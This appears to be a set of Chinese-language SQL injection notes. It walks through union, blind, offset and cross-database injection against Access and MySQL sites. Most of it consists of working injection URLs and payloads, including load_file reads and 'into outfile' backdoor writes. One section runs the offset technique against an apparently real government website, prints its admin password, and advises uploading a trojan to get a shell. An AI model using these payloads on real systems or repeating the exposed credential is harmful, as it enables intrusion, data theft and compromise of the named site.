access数据库:
Sql注入原理分析:
网站程序存在可控传递参数,参数未进行过滤直接带入数据库查询,导致攻击者可通过传递恶意sql语句代码进行执行攻击。
Sql注入产生条件:
1.必须有参数传递 2.参数值带入数据库查询并执行
判断注入方法:
单引号‘ and 1=1 and 1=11
asp语言:
<% asp语言开端
id=request("id") 接受参数名id(后面)的值赋值给变量id(前面)
sql="select * from product where id="&id 将变量id的值组合到sql语句中
set rs=conn.execute(sql) 执行sql语句
%> asp语言结尾
三种方法注入:
1.access注入攻击片段-联合查询法
(1)判断注入
单引号等确认诸如后:例如
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22正常
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23错误 说明有22个字段
(2)猜解表名
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin 这一步是确定是否存在admin表,不存在试试user之类的。
(3)猜解列名、猜解数据
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin 在admin表中确人是否有admin及password字段,如果存在admin字段就会显示出数据来。
2.access注入攻击片段-逐字猜解法
(1)查表
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from 表名)
(2)查列
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select 列名 from 表名) 根据查到的表明查列
(3)查数据
分2步:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5 先确定第一列列名数据的长度
and (select top 1 asc(mid(列名,位数,1)) from admin)=97 确认第一列列名的数据第一位数什么。
3.工具类的使用注入
可以使用:啊D、明小子、萝卜头、sqlmap、穿山甲...........................
表名和列名猜解成功率不是百分百,猜解不到解决办法?
1.字典文件收集(社工)
2.Access偏移注入
偏移注入的步骤:
例如http://www.hnjyw.gov.cn/show.asp?id=762这个链接是存在注入的。
(1)先http://www.hnjyw.gov.cn/show.asp?id=762 order by 20 确定一下字段长度。(20正确,21错误说明20个字段)
(2)确定表名:http://www.hnjyw.gov.cn/show.asp?id=764 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin (如果返回页面正确,说明存在admin列)
(3)这个时候会爆出几个字段,就在相应的字段试一下username,password等查看是否可以查询到数据
http://www.hnjyw.gov.cn/show.asp?id=764UNION SELECT 1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin (如果显示出数据,那就完成了,如果这一步还是出错,啥都没有,只能偏移注入了)
偏移注入关键步骤:
(4)先把第20用*代替,查看是否正确,错误继续到19,一直到正确为止。(此列确定admin表里有4个字段 既然我们知道admin表里有四个字段了 那么我们继续
http://www.hnjyw.gov.cn/show.asp?id=762 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin返回正确
(5)因为下面我们使用了a.id和b.id,占用了8个字段,所以就按照下面方式写
http://www.hnjyw.gov.cn/show.asp?id=764 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,* from (admin as a inner join admin as b on a.id=b.id)
但是返回结果没变,没有爆出用户名和密码,继续再来,再12后面加上a.id再试试
http://www.hnjyw.gov.cn/show.asp?id=764 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,a.id,* from (admin as a inner join admin as b on a.id=b.id)
返回结果还是没有变,再来在a.id后面再加上b.id
http://www.hnjyw.gov.cn/show.asp?id=764 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
结果还是没爆出来,我们还得继续,我们在12后面再减去4,那就是
http://www.hnjyw.gov.cn/show.asp?id=764 UNION SELECT 1,2,3,4,5,6,7,8,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)这样了
他的用户名字段就是admin,密码:hnjyw888 知道后就找后台,用工具或者一个个试。登陆后台上传马拿shell。
MySql数据库:
Php+mysql注入点渗透思路
1.猜解密码
2.跨库注入(root权限)
3.文件读取写入(root用户)
root权限与非root权限
非root
猜密码->找后台->后台拿shell
Root
猜密码->找后台->后台拿shell
猜网站目录->写后门->获取shell
猜网站目录,敏感文件->读取指定文件->综合渗透
跨库注入->综合渗透
敏感文件(数据库配置文件,系统记录文件等)
数据库操作流程:
连接数据库->选择数据库->定义sql语句并执行->返回结果并处理->关闭连接
结构分层:
Mysql数据库
数据库A
表名
列名
数据
数据库B
表名
列名
数据
MySql数据库版本:
1、5.0以下注入
2、5.0以上注入
Information_schema:mysql5.0及以上版本内置数据库,存储有mysql下所有数据库的表名及列名信息
Information_schema.tables:存储所有表名信息的表
Information_schema.columns:存储所有列名信息的表
Table_name:表名
Table_schema:数据库名
Column_name:列名
注入步骤:
数据库名:database() sqlin 数据库版本:version() 5.5.40 数据库用户:user() root@localhost 操作系统:@@version_compile_os
其他请百度查找mysql内置获取函数
(1)获取以上信息:
http://127.0.0.1/wl14/test.php?x=1 union select database(),version(),user()
(2)获取sqlin数据库下的表名信息:
http://127.0.0.1/wl14/test.php?x=1 union select table_name,2,3 from information_schema.tables where table_schema=0x73716C696E(数据库16进制)
(3)获取***表名下的列名信息:
http://127.0.0.1/wl14/test.php?x=1 union select column_name,2,3 from information_schema.columns where table_name=0x61646D696E
(4)获取某字段数据:
http://127.0.0.1/wl14/test.php?x=1 union select username,password,3 from admin
Mysql文件读取及写入(root用户)
注意事项:
1.符号问题
磁盘目录结构符号“/”或“\\”
D:/www对
D:\\www对
D:\www错
2.编码问题
采用编码就不用符号,采用符号就不用编码
入侵思路:
获取root注入点->寻找网站路径->进行文件写入(写入后门)
网站路径获取:
(1)报错显示(2)搜索引擎 site tw.edu.cn Worning (3) phpinfo遗留文件等
注入点读取操作:
http://127.0.0.1/wl14/test.php?x=1 union select load_file('d:/yjh.php'),2,3
注入点写入操作:
http://127.0.0.1/wl14/test.php?x=1 union select 'aaaa',2,3 into outfile 'd:/111.txt'
注入点无法写入读取情况:
1.非root用户
2.是root用户被转义、过滤。 文件权限。 防护软件拦截
Php+mysql过滤 转义过滤
(1)php.ini设置魔术引号 magic_quotes_gpc (2)Php内置函数 addslashes()
看到报错是\ 'd:/yjh.php\' 就知道是转义了
绕过思路:
1.编码注入
2.宽字节注入 (意思就是英文字符占用一个字符,汉字占两个,就可以把转义挤掉,具体怎么弄不太清楚。所以先用编码注入吧)
MySql跨库注入
条件:mysql注入点为root权限
攻击步骤
1.获取当前mysql下所有数据库名
union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from
information_schema`.schemata limit 0,1),0x31303235343830303536-- 最主要的一步,0代表的第一个数据库,以此类推,把所有数据库都可以跑出来。
2.获取指定数据库下的表名信息
http://127.0.0.1//wl14/test.php?x=1%20union%20select%20table_name,2,3%20from%20information_schema.tables%20where%20table_schema=0x69736561636D73(其他需要的数据库)
3.获取指定表名下的列名信息
http://127.0.0.1//wl14/test.php?x=1%20union%20select%20column_name,2,3%20from%20information_schema.columns%20where%20table_name=0x6D616E616765(列名)
4.获取指定数据
127.0.0.1//wl14/test.php?x=1 union select user,password,3 from iseacms.manage(必须带上数据库下的managePOST注入:)
Post注入:
一般登录时就是Post注入
select * from admin where username='$user' and password='$pass'
1.请求方式注入语句要以post发送
2.注入需要绕过单引号
Cookie注入:
cookie注入就是发生在cookie里,有些sql语句是读取cookie的
Http头注入:
类似前面cookie,发生在user-Agent,host
字符型注入:
构造sql语句时就是闭合单引号:
http://127.0.0.1/sqlin/str/index.php?s=admin
select * from admin where username='admin'
数字型注入:
www.xxxx.com/news.php?id=1
搜索型注入:
发生在搜索框,也是注意闭合
http://127.0.0.1/sqlin/search/index.php?name=zebra
select * from admin where username like '%zebra%' order by username
闭合语句 %' 1 union select 1,2,3 and %'不同类型不一样
可以看看搜索注入方法点击
加解密注入:
http://127.0.0.1/sqlin/base64/index.php?id=MQ==
先要写好sql语句然后加密查询。